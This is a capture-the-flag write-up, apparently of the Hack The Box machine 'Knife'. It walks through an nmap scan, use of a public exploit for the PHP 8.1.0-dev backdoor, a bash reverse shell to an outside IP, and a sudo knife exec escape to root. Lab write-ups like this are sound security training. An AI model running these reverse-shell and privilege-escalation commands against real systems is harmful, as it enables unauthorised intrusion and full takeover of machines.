Recon
Nmap scan
With nmap we found two open ports. A webserver and ssh server.
1
2
3
4
5
6
7
8
|
# basic scan
nmap -A -sV -Pn 10.10.10.40
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
|
Vulnerabilities
Thanks to wappalyzer, we found version of apache and php:
We search for known vulnerabilities on exploitdb.
1
2
3
4
5
6
7
|
./searchexploit apache 2.4.41 # nothing
./searchexploit php 8.1.0
# PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution | php/webapps/49933.py
# PHP-Nuke 8.1.0.3.5b (Your_Account Module) - Blind SQL Injection (Benchmark Mode) | php/webapps/14320.pl
# PHP-Nuke 8.1.0.3.5b - 'Downloads' Blind SQL Injection | php/webapps/18148.pl
# PHP-Nuke 8.1.0.3.5b - Remote Command Execution | php/webapps/14319.pl
|
We find a known RCE on that PHP version. Let’s try to exploit this vulnerability.
Exploit
Entry point
We try a first script found with searchexploit
1
2
3
4
5
6
7
|
# PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
python3 exploitdb/exploits/php/webapps/49933.py
Enter the full host url:
http://10.10.10.242/icons/
$ whoami
james
|
We got our first shell. We are connected into the server with james user. We manage to get a clean shell.
1
2
3
4
|
# on host
nc -lvnp 4444
# on target
bash -c "bash -i >& /dev/tcp/10.10.16.6/4444 0>&1"
|
We can get the first user flag.
privesc
I manage first to check if they are command that the user james can run with sudo rights.
1
2
3
4
5
|
# list commands that james can run with sudo
sudo -l
User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife
|
We can see here that james can run the command knife with root permission without enter any password. Let’s check what option knife can take. Maybe a command enumeration is possible.
1
2
3
4
|
knife --help
** EXEC COMMANDS **
knife exec [SCRIPT] (options)
|
Bingo! After some research on the helper I found the sub-command exec that allow us to execute command. Let’s try to pop a root shell !
1
2
3
4
5
|
sudo -u root knife exec '/bin/bash'
ERROR: SyntaxError: /bin/bash: Invalid char `\x7F' in expression
/bin/bash: Invalid char `\x02' in expression
/bin/bash: Invalid char `\x01' in expression
/bin/bash: Invalid char `\x01' in expression
|
I first get an error. The command miss interpret some character. I found the option -E that allow to run command with the sub-command exec.
1
2
3
4
|
# lets try -E option to pass command
sudo -u root knife exec -E 'exec "/bin/bash"'
whoami
root
|
We are root! We can get the flag and close the box !
PHP, Backdoor, Easy, External, Apache, Penetration Tester Level 1, A06:2021-Vulnerable And Outdated Components, Public Vulnerabilities, Sudo Exploitation, Enumeration
